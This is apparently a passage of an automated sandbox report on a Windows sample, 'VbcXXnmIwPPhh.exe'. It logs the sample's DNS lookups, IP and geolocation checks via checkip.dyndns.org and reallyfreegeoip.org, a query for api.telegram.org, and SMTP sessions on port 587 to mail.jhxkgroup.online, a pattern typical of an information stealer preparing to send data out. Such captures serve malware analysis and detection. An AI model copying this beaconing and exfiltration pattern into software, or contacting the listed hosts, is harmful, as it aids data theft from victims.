Sep 26, 2024 13:47:43.579121113 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.745894909 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.746234894 CEST	49738	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:43.751029015 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.794843912 CEST	49738	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:43.800013065 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.800337076 CEST	49738	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:54.918637991 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:54.923682928 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:54.923783064 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:55.490883112 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:55.491156101 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:55.496195078 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:55.944158077 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:55.944339991 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:55.944634914 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:55.944695950 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:55.949249983 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.117739916 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.118177891 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:56.123083115 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.298532963 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.298583031 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.298619986 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.298655033 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.298697948 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:56.298778057 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:56.385951996 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.387582064 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:56.392508984 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.858258009 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.858572006 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:56.858655930 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:57.669415951 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:57.674406052 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:57.842025042 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:57.842366934 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:57.847268105 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.016581059 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.016839027 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:58.021780968 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.191752911 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.192056894 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:58.196989059 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.364747047 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.364938021 CEST	49739	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:58.369812012 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.858369112 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.858958960 CEST	587	49739	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:58.862848043 CEST	49739	587	192.168.2.7	217.12.218.219

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 13:44:04.809223890 CEST	59691	53	192.168.2.7	1.1.1.1
Sep 26, 2024 13:44:04.816618919 CEST	53	59691	1.1.1.1	192.168.2.7
Sep 26, 2024 13:44:08.568409920 CEST	60766	53	192.168.2.7	1.1.1.1
Sep 26, 2024 13:44:08.575551033 CEST	53	60766	1.1.1.1	192.168.2.7
Sep 26, 2024 13:44:23.121887922 CEST	64580	53	192.168.2.7	1.1.1.1
Sep 26, 2024 13:44:23.128668070 CEST	53	64580	1.1.1.1	192.168.2.7
Sep 26, 2024 13:44:29.404820919 CEST	61912	53	192.168.2.7	1.1.1.1
Sep 26, 2024 13:44:29.537338972 CEST	53	61912	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 13:44:04.809223890 CEST	192.168.2.7	1.1.1.1	0xbcd3	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:08.568409920 CEST	192.168.2.7	1.1.1.1	0x1c51	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:23.121887922 CEST	192.168.2.7	1.1.1.1	0x2187	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:29.404820919 CEST	192.168.2.7	1.1.1.1	0x56a0	Standard query (0)	mail.jhxkgroup.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:04.816618919 CEST	1.1.1.1	192.168.2.7	0xbcd3	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:08.575551033 CEST	1.1.1.1	192.168.2.7	0x1c51	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:08.575551033 CEST	1.1.1.1	192.168.2.7	0x1c51	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:18.155852079 CEST	1.1.1.1	192.168.2.7	0x4c0a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:18.155852079 CEST	1.1.1.1	192.168.2.7	0x4c0a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:23.128668070 CEST	1.1.1.1	192.168.2.7	0x2187	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:44:29.537338972 CEST	1.1.1.1	192.168.2.7	0x56a0	No error (0)	mail.jhxkgroup.online		217.12.218.219	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:47:56.949667931 CEST	1.1.1.1	192.168.2.7	0x55d3	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 26, 2024 13:47:56.949667931 CEST	1.1.1.1	192.168.2.7	0x55d3	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:04.831887960 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:08.174153090 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 13:44:08.179656029 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 13:44:08.521030903 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 13:44:09.271049976 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 13:44:10.228789091 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49707	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:11.014173031 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 13:44:12.383827925 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:13.010843992 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:14.390242100 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 13:44:14.390527964 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49711	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:15.083157063 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:15.913089037 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49713	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:16.863032103 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:17.661098003 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49718	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:18.312475920 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:19.110460043 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49720	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:20.084980965 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:20.990175009 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49724	132.226.8.169	80	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 13:44:21.603833914 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 26, 2024 13:44:22.485083103 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:22 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:09 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 11:44:09 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:09 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15881 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=soCFaHSss%2BIY0ZCcPrlZpk6adMvmkGbvI7eDVpZIZIfML4nGniRhi3T2fiLYub%2BzEK5yVNsXZ%2FbiHraZTgJwdlaAK4xdU1%2FJpupPa5vfpErDjW8NODKCSHLMvVgPBvm3W5hu0dAN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9300196e23432b-EWR
2024-09-26 11:44:09 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49706	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:10 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 11:44:10 UTC	690	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15882 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8I7q0rDNQS%2Fg%2B7t%2B7e49OyUHVOfHjFElDpv0y%2FC6uHOjF%2BQHDO9D%2B%2BZUQ%2F1ARTFsksrIAVisMoSLOiKXRV99ATQrVqnVm7eR3dcHDLblmLE1wXfekg%2FJgHfo6VKhy6pl7ve%2Fh2zS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9300246d0b2365-EWR
2024-09-26 11:44:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 11:44:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49708	188.114.96.3	443	4888	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 11:44:12 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 11:44:12 UTC	684	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 11:44:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 15884 Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=slHlDaRvOlyz94KZl7X3nJgrQhEft1S%2B5hydCsFLBWK8%2BBb%2FMQlSWcv%2FTUq6xMJh%2FRn5pIiXQ9Z0JoJH0pmEE54bqW00l%2BE19aSrNjq7tdWD33cRsmauebyhoS%2FWE8EiCZdpP6U8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c930030d9d7c34b-EWR
